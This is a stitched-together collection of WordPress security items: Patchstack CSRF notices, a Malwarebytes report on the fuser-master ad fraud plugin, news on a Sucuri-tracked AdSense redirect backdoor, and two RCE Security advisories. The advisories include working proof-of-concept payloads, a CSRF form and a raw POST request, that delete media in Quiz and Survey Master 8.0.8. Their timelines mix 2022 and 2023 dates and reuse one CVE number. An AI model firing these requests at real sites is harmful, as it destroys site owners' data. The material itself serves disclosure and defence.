Cross-Site Request Forgery (CSRF) vulnerability in HasThemes Extensions For CF7 plugin <= 2.0.8 versions leads to arbitrary plugin activation.

**Solution**

Update the WordPress Extensions For CF7 plugin to the latest available version (at least 2.0.9).

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Extensions For CF7 Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 2.0.9.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23899: WordPress Extensions For CF7 (Contact form 7 Database, Conditional Fields and Redirection) plugin <= 2.0.8 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Categories: Threat Intelligence
Tags: ad fraud

Tags:  popunder

Tags:  ads

Tags:  fraud

Tags:  wordpress

Tags:  plugins

Popunders are the ideal vehicle to serve ad fraud. In this case, we investigate a scheme where a webpage you can't see is loading a bunch of ads while code mimics user activity by scrolling and visiting links.



(Read more...)




The post WordPress sites backdoored with ad fraud plugin appeared first on Malwarebytes Labs.

WordPress is an immensely popular content management system (CMS) powering over 43% of all websites. Many webmasters will monetize their sites by running ads and need to draw particular attention to search engine optimization (SEO) techniques to maximize their revenues.

But some people will take a shortcut to gaining traffic by engaging in legal but sometimes fraudulent practices. In this instance, we identified someone buying popunder traffic to promote their websites. A popunder is a very common occurrence online and consists of launching a secondary page under the current one. In itself, it could be considered simply an annoyance and is not malicious except when the website that is being launched uses various techniques to defraud advertisers.

We discovered a few dozen WordPress blogs using the same plugin that mimics human activity by automatically scrolling a page and following links within it, all the while a number of ads were being loaded and refreshed. The blogs would only exhibit this invalid traffic behavior when launched from a specific URL created by this plugin, otherwise they appeared completely legitimate.

In this post, we share the technical details behind this ad fraud scheme and any clues pointing to the developer of this WordPress plugin.

**Key findings**

*   About 50 WordPress blogs have been backdoored with a plugin called fuser-master
*   One of the blogs performing this ad fraud had 3.8 M visits in January, with an average visit duration of 24:55 minutes and 17.50 pages per visit
*   This plugin is being triggered via popunder traffic from a large ad network
*   The WordPress sites are being loaded in a separate page underneath and display a number of ads
*   The plugin contains JavaScript code that mimics the activity of a real visitor: scrolls the page, clicks on links, etc.
*   The code also monitors for real human activity (mouse movement) and will immediately stop the fake scrolling when that happens

_Figure 1: Diagram summarizing ad fraud case_

**Fuser-master WordPress plugin**

Recently we blogged about ad fraud involving a popunder as well, except in that case it was using an iframe to hide the ads. Here, there is nothing hidden at all and the ad fraud can only be deduced when the page is being scrolled down, and back up at random intervals. Because it is a popunder, anyone becomes an unwitting accomplice and does not see any of the fraudulent behavior.

In this investigation, we won't be spending time on the ad network facilitating these popunders but we have a fairly good idea of which one it might be based on anti-debugging code that they used. What makes popunders particularly enticing for ad fraud is the fact they allow content to be loaded and remain until further action. Unlike the main browser window where a user can easily navigate away from the current website they are visiting, the popunder will remain open for several minutes or even hours, until it is closed.

We were able to trigger the popunder several times and noticed that the fraudsters were using several different blogs that all had the same thing in common, namely they used a plugin called 'fuser-master'. There aren't many references for this plugin such as where to download it or who its author might be. We were only able to find one mention from themesinfo.com which is a WordPress theme detector.

_Figure 2: A list of websites using the fuser-master plugin_

Not all the sites listed in the gallery still exist or are fully functional, but that still gave us a good indication of what was being used to turn standard blogs into ad fraud robots. It's worth mentioning again that when visited at their homepage, all these blogs are static in nature, meaning we don't see this kind of zombie activity where the page is scrolling by itself. In the next section, we will look at the URL entry point that triggers that specific behavior.

**User check and redirect**

All of these blogs appear typical when visited directly, so they would likely pass both a manual and human verification. However, when a special URL (the entry point) is entered with the corresponding parameters, they turn into ad fraud. Below you can see the URL path and its parameters that are being used on all the blogs where that plugin has been installed:

**/wp-content/plugins/fuser-master/entrypoint.php?**

*   e
*   Iptoken
*   websiteid
*   geo

First, the current user is checked to determine if they should be allowed to enter into the ad fraud scheme or not:

_Figure 3: Pre-check for cookies_

The fraudsters are using open redirects from Google and Twitter in an interesting way. A keyword from an array corresponding to related Google search terms is picked and added to a Google search URL:

_Figure 4: SEO trick_

That keyword is chosen randomly and makes up the dynamic redirect URL:

_Figure 5: Keyword used in redirect_

The next web request is the actual redirect code which also drops some cookies. The URL and code for the redirect will vary based on the different options set up previously:

_Figure 6: Google open redirect_ 

_Figure 7: Twitter open redirect_

The popunder will effectively load the blog via the entrypoint, then immediately leave it to re-enter via a Google open redirect as if someone had clicked on one of the search results. This is what it looks like:

_Figure 8: Animation showing open redirect mechanism_

**Faking user activity**

As mentioned previously, the blogs will only exhibit their ad fraud nature when visited via the fuser-master plugin's entry point. We know that this happens when a user was browsing the web, clicked on a page and a popunder was launched. The blog will open up in a new window **behind** the current window, which means the user is completely unaware of what is happening.

It becomes quickly obvious that there is something odd when the popunder is exposed. We notice some scrolling back and forth and somewhat randomly which truly mimics what a human would do when reading an article. When looking at the code we can see that it checks for user activity (more on that later) and only performs this scrolling activity if it has not detected real mouse movements on the page:

_Figure 9: Code for automated scrolling_

Had the popunder been the same blog without this fake scrolling there would be no reason to suspect mischief. Of course the fraudsters aren't interested in a static page without any kind of user interaction as their goal is monetization via ads. This invalid traffic needs to look as valid as possible in order to not get flagged by anti ad fraud solutions:

_Figure 10: Animation showing automated scrolling_

Another interesting aspect of this fraud is how at regular intervals, a new article is being viewed. This makes sense in the context of a standard visitor to a blog continuing on the site by following other articles that they might be interested in reading. Looking at the fuser-master's code, we see that it tries to get all internal URLs from the currently loaded page and places these links into an array. If we observe what's happening, see that after a certain number of scrolling up and down, a different article gets loaded and the scrolling resumes. This fake activity could last from minutes to hours, until it is interrupted by the real human who's currently at their computer.

**Freeze game**

At some point, the real user will close their browser or the page that was in front of the popunder. When that happens, all fake activity suddenly stops and the blog becomes static. This is a clever trick to avoid suspicion and reminds us of the 'freeze' game kids play. The fraudsters are able to detect when the mouse is being placed over the current page and can quickly stop the code from running.

_Figure 11: Monitoring for real user activity_

Figure 12: Stopping fake activity after real user is detected

**Same web developer built those blogs**

Looking through the Internet Archive, we identified an Indian web developer behind several of these sites. Some of the older posts were written by him and the layout such as the scroll bar style and test ads are also identical. There is nothing that definitely proves that this web developer created the ad fraud plugin although he had the technical skills to do so and based on his community WordPress identity was involved in a number of posts about various SEO plugins.

_Figure 13: Demo blog using a similar template reused elsewhere_

In addition, his own business website also features those blogs in his portfolio and while hovering over the thumbnails we can't help but notice a scrolling technique very similar to what we saw previously with the ad fraud.

_Figure 14: Portfolio showcasing some of the blogs_

We contacted one of his supposed customers to let them know about the fuser-mater plugin running on their site. While we did not hear back from them, within about an hour the plugin had been removed from their WordPress installation.

_Figure 15: Fuser-master plugin was deleted shortly after our notification_

If the web developer wanted to earn from this ad fraud scheme, he would need to have his own publisher IDs and overwrite the ones used by his customers, however we could not immediately verify that this was the case. It's also possible that the plugin is sold as an "add-on" and that some of his customers are fully aware of it, but we could not prove that either.

Contrary to the previous ad fraud case we looked at, this one does not simply use Google ads. Instead they are going through a number of ad platforms which makes their publisher ID and potential revenue more difficult to figure out. We do know that one of the websites featured in this investigation (momplaybook\[.\]com) had 3.8 million visitors in January, spending an average of 24 minutes and looking at 17 pages on the site (stats by SimilarWeb).

_Figure 16: Malwarebytes Browser Guard_

Visiting that same website, Malwarebytes Browser Guard blocked over a thousand ad trackers after a few minutes of sitting idle on the main page. The majority of requests came from Google's DoubleClick and OpenX which we have informed.

**Conclusion**

While popunders are a legitimate form of advertising, their very format is susceptible to abuse. For ad fraud in particular, popunders allow websites to be loaded and serve ads that will never be viewed by real humans.

The plugin we identified during this investigation is relatively simple and allows anyone with an ordinary WordPress blog to increase their earnings dramatically. Because regular visitors will come to the blog via a different flow (standard search or referral link), none of the fraudulent behaviors will be shown. All that is needed is to purchase ad space via a large popunder distributor and use the special entry point URL that triggers the fuser-master plugin.

We have shared details about this invalid traffic case with other partners in the industry.

**Indicators of Compromise**

momplaybook\[.\]com

geekextreme\[.\]com

femme4\[.\]com

mealplays\[.\]com

dorkfuel\[.\]com

automobilenews\[.\]net

thedailycute\[.\]com

beingexpat\[.\]com

klinkeltown\[.\]com

tidbitsofexperience\[.\]com

lostmeals\[.\]org

bakedoccasions\[.\]com

bakedoccasions\[.\]com

brightsidebeauty\[.\]com

cookbooksandkids\[.\]com

bowlsunset\[.\]com

thereporterz\[.\]com

basicguru\[.\]com

bonafidepress\[.\]com

geeksdigest\[.\]com

hairstylesideashub\[.\]com

techlivewire\[.\]com

thecryptosyndicate\[.\]com

theframeloop\[.\]com

thegamershub\[.\]co\[.\]uk

fastmint\[.\]com

gordigecr\[.\]it

techlivewire\[.\]com

bonafidepress\[.\]com

chaosandkiddos\[.\]com

geekandtech\[.\]com

geeksdigest\[.\]com

rec-canada\[.\]com

madassgamers\[.\]com

cravecanada\[.\]com

travelnicer\[.\]com

geartaxi\[.\]com

berrry\[.\]com

buytechstuff\[.\]com

pagehabit\[.\]com

techcola\[.\]com

techdeed\[.\]com

rebelgamejam\[.\]com

leftrightpolitics\[.\]com

followthatbitcoin\[.\]com

WordPress sites backdoored with ad fraud plugin

WordPress Quiz and Survey Master plugin versions 8.0.8 and below suffer from a cross site request forgery vulnerability.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Quiz And Survey Master  
Vendor URL:     https://wordpress.org/plugins/quiz-master-next/  
Type:           Cross-Site Request Forgery (CSRF) [CWE-352]  
Date found:     2023-01-13  
Date published: 2023-02-08  
CVSSv3 Score:   6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)  
CVE:            CVE-2023-0292

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Quiz And Survey Master 8.0.8 and below

4. INTRODUCTION  
===============  
Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used  
to create engaging content to drive traffic and increase user engagement.  
Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee  
surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The plugin offers the ajax action "qsm_remove_file_fd_question" which is used to  
delete uploaded media contents from the WordPress instance. However, the  
functionality is not protected by an anti-CSRF token/nonce.

Since there is no anti-CSRF token protecting this functionality, it is vulnerable  
to Cross-Site Request Forgery attacks allowing an attacker to delete uploaded  
media contents on behalf of the attacked user.

To successfully exploit this vulnerability, a user with the right to access the  
plugin must be tricked into visiting an arbitrary website while having an  
authenticated session in the application.

6. PROOF OF CONCEPT  
===================  
The following Proof-of-Concept would delete the uploaded media with the ID "1":

<html>  
    
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="qsm_remove_file_fd_question" />  
      <input type="hidden" name="media_id" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>

7. SOLUTION  
===========  
Update to version 8.0.9

8. REPORT TIMELINE  
==================  
2023-01-13: Discovery of the vulnerability  
2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291  
2023-01-18: Sent initial notification to vendor via contact form  
2022-01-18: Vendor response  
2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability  
2022-02-08: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress Quiz And Survey Master 8.0.8 Cross Site Request Forgery

WordPress Quiz and Survey Master plugin versions 8.0.8 and below suffer from a missing authentication vulnerability that allows an attacker to delete media from the WordPress instance.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Quiz And Survey Master  
Vendor URL:     https://wordpress.org/plugins/quiz-master-next/  
Type:           Missing Authentication for Critical Function [CWE-306]  
Date found:     2023-01-13  
Date published: 2023-02-08  
CVSSv3 Score:   7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)  
CVE:            CVE-2023-0291

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Quiz And Survey Master 8.0.8 and below

4. INTRODUCTION  
===============  
Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used  
to create engaging content to drive traffic and increase user engagement.  
Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee  
surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The plugin offers the ajax action "qsm_remove_file_fd_question" to unauthenticated  
users which accepts a "media_id" parameter pointing to a any item uploaded through  
WordPress' media upload functionality. However, this "media_id" is afterward used  
in a forced wp_delete_attachment() call ultimately deleteing the media from the  
WordPress instance.

Successful exploits can allow an unauthenticated attacker to delete any (and all)  
uploaded WordPress media files.

6. PROOF OF CONCEPT  
===================  
The following Proof-of-Concept would delete the uploaded media with the ID "1":

POST /wp-admin/admin-ajax.php HTTP/2  
Host: localhost  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 44

action=qsm_remove_file_fd_question&media_id=1

7. SOLUTION  
===========  
Update to version 8.0.9

8. REPORT TIMELINE  
==================  
2023-01-13: Discovery of the vulnerability  
2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291  
2023-01-18: Sent initial notification to vendor via contact form  
2022-01-18: Vendor response  
2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability  
2022-02-08: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

--  
Mit freundlichen Grüßen / With best regards / Atentamente

Julien Ahrens  
Freelancer | Penetration Tester

RCE Security  
VAT-ID: DE328576638  
Website: www.rcesecurity.com

This e-mail may contain confidential and/or privileged information.  
If you are not the intended recipient (or have received this e-mail in  
error) please notify the sender immediately and destroy this e-mail.  
Any unauthorized copying, disclosure or distribution of the material  
in this e-mail is strictly forbidden.

WordPress Quiz And Survey Master 8.0.8 Media Deletion

The threat actors behind the black hat redirect malware campaign have scaled up their campaign to use more than 70 bogus domains mimicking URL shorteners and infected over 10,800 websites.
"The main objective is still ad fraud by artificially increasing traffic to pages which contain the AdSense ID which contain Google ads for revenue generation," Sucuri researcher Ben Martin said in a report

Ad Fraud / Online Security

The threat actors behind the black hat redirect malware campaign have scaled up their campaign to use more than 70 bogus domains mimicking URL shorteners and infected over 10,800 websites.

"The main objective is still ad fraud by artificially increasing traffic to pages which contain the AdSense ID which contain Google ads for revenue generation," Sucuri researcher Ben Martin said in a report published last week.

Details of the malicious activity were first exposed by the GoDaddy-owned company in November 2022.

The campaign, which is said to have been active since September last year, is orchestrated to redirect visitors to compromised WordPress sites to fake Q&A portals. The goal, it appears, is to increase the authority of spammy sites in search engine results.

"It's possible that these bad actors are simply trying to convince Google that real people from different IPs using different browsers are clicking on their search results," Sucuri noted at the time. "This technique artificially sends Google signals that those pages are performing well in search."

What makes the latest campaign significant is the use of Bing search result links and Twitter's link shortener (t\[.\]co) service, along with Google, in their redirects, indicating an expansion of the threat actor's footprint.

Also put to use are pseudo-short URL domains that masquerade as popular URL shortening tools like Bitly, Cuttly, or ShortURL but in reality direct visitors to sketchy Q&A sites.

Sucuri said the redirects landed on Q&A sites discussing blockchain and cryptocurrency, with the URL domains now hosted on DDoS-Guard, a Russian internet infrastructure provider which has come under the scanner for providing bulletproof hosting services.

"Unwanted redirects via fake short URL to fake Q&A sites result in inflated ad views/clicks and therefore inflated revenue for whomever is behind this campaign," Martin explained. "It is one very large and ongoing campaign of organized advertising revenue fraud."

It's not known precisely how the WordPress sites become infected in the first place. But once the website is breached, the threat actor injects backdoor PHP code that allows for persistent remote access as well as redirect site visitors.

"Since the additional malware injection is lodged within the wp-blog-header.php file it will execute whenever the website is loaded and reinfect the website," Martin said. "This ensures that the environment remains infected until all traces of the malware are dealt with."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Massive AdSense Fraud Campaign Uncovered - 10,000+ WordPress Sites Infected

By Waqas
All infected websites are using the WordPress CMS.
This is a post from HackRead.com Read the original post: Adsense abused: 11,000 sites hacked in a backdoor attack

The campaign has been active since September 2022, and the recent surge in website infections was noted in January 2023.

Sucuri researchers have reported a backdoor that has successfully infected around 11,000 websites in recent months. Here are the details shared by Sucuri in its technical report.

It is a fact that, lately, several Google products have been exploited and abused to spread malware and other malicious components, including **Google Ads**, **Google Home**, and **Google Drive**.

In fact, **a study revealed** that Google Drive accounted for 50% of malicious Office document downloads in 2022.

**Backdoor Redirecting Visitors to Hacked Sites**

According to Sucuri’s research, the backdoor redirects users to sites that show fraudulent views of **Google AdSense ads**. The company’s SiteCheck remote scanner has detected more than 10,890 infected sites. The activity has further intensified recently, with 70 new malicious domains disguised as legitimate in 2023 and 2,600 infected sites discovered on the web.

All the infected websites detected by Sucuri were using **WordPress CMS**. These had an obfuscated PHP script injected into the legitimate files on the websites, such as index.php, wp-activate.php, wp-signup.php, and wp-cron.php, etc.

**How Does the Attack Work?**

In the past two months, Sucuri researchers have identified over 75 pseudo-short URL domains linked with redirected traffic. It must be noted that almost all of the malicious URLs appear to belong to the same **URL-shortening service**. Some even mimic the names of popular shortening services, such as Bitly.

The visitors are redirected to a range of low-quality websites developed on the Question2Answer CMS, and the discussion topics are mostly related to cryptocurrency or **blockchain**.

Researchers believe it could be intentional to advertise new cryptocurrencies in a pump-and-dump, ICO fraud. However, researchers are certain that the primary objective of this ad fraud is to inorganically increase traffic to sites that contain the AdSense ID so that **Google ads** can be displayed for revenue generation.

Image source: Sucuri

**How does It Evade Detection?**

Some of these malicious sites also inject obfuscated code into “wp-blog-header.php.” This code works as a backdoor to ensure the malware evades disinfection attempts. It performs this by loading itself into files that run as soon as the targeted server is restarted.

“Since the additional malware injection is lodged within the wp-blog-header.php file it will execute whenever the website is loaded and reinfect the website. This ensures that the environment remains infected until all traces of the malware are dealt with.”

The malware hides its presence by suspending redirections when a visitor logs in as an administrator or visits an infected site within 2 to 6 hours. The malicious code is hidden using Base64 encoding.

**How URL Shorteners Abused in the Attack?**

When the user enters any domain names in their browser, they are redirected to a real URL shortening service, e.g., Cuttly or Bitly, but these are not genuine public URL shorteners. Each domain has a few working URLs that redirect visitors to spammy Q&A sites featuring AdSense monetization.

In a **blog post**, Sucuri researcher Ben Martin stated that the “backdoors download additional shells and a Leaf PHP mailer script from a remote domain filestacklive and place them in files with random names in wp-includes, wp-admin, and wp-content directories.”

The campaign has been active since September 2022, and the recent surge in website infections was noted in January 2023.

“At this point, we haven’t noticed malicious behaviour on these landing pages. However, at any given time, site operators may arbitrarily add malware or start redirecting traffic to other third-party websites,” researchers noted.

1.  **Google Docs exploit to spread phishing** **links**
2.  **Google, Microsoft and Oracle generated most flaws**
3.  **Malware-infected Minecraft modpacks hit Play Store**
4.  **Ad-blocker extension injected ads in Google searches**
5.  **Fake Brave browser site drops malware from Google Ads**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Adsense abused: 11,000 sites hacked in a backdoor attack

Cross-Site Request Forgery (CSRF) vulnerability in Photon WP Material Design Icons for Page Builders plugin <= 1.4.2 versions.

**Solution**

Update the WordPress Material Design Icons for Page Builders plugin to the latest available version (at least 1.4.3).

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Material Design Icons for Page Builders Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 1.4.3.

**1 other known vulnerability for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-24382: WordPress Material Design Icons for Page Builders plugin <= 1.4.2 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress plugin <= 8.0.7 versions.

**Solution**

Update the WordPress Quiz And Survey Master plugin to the latest available version (at least 8.0.8).

Oliver K. discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Quiz And Survey Master Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 8.0.8.

**19 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-46862: WordPress Quiz And Survey Master plugin <= 8.0.7 - Cross Site Request Forgery (CSRF) - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Ecwid Ecommerce Ecwid Ecommerce Shopping Cart plugin <= 6.11.3 versions.

**Solution**

Update the WordPress Ecwid Shopping Cart plugin to the latest available version (at least 6.11.4).

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Ecwid Shopping Cart Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 6.11.4.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-24377: WordPress Ecwid Ecommerce Shopping Cart plugin <= 6.11.3 - Cross Site Request Forgery (CSRF) - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in ShapedPlugin WP Tabs – Responsive Tabs Plugin for WordPress plugin <= 2.1.14 versions.

**Solution**

Update the WordPress WP Tabs plugin to the latest available version (at least 2.1.15).

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress WP Tabs Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 2.1.15.

**1 other known vulnerability for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

Tag

#wordpress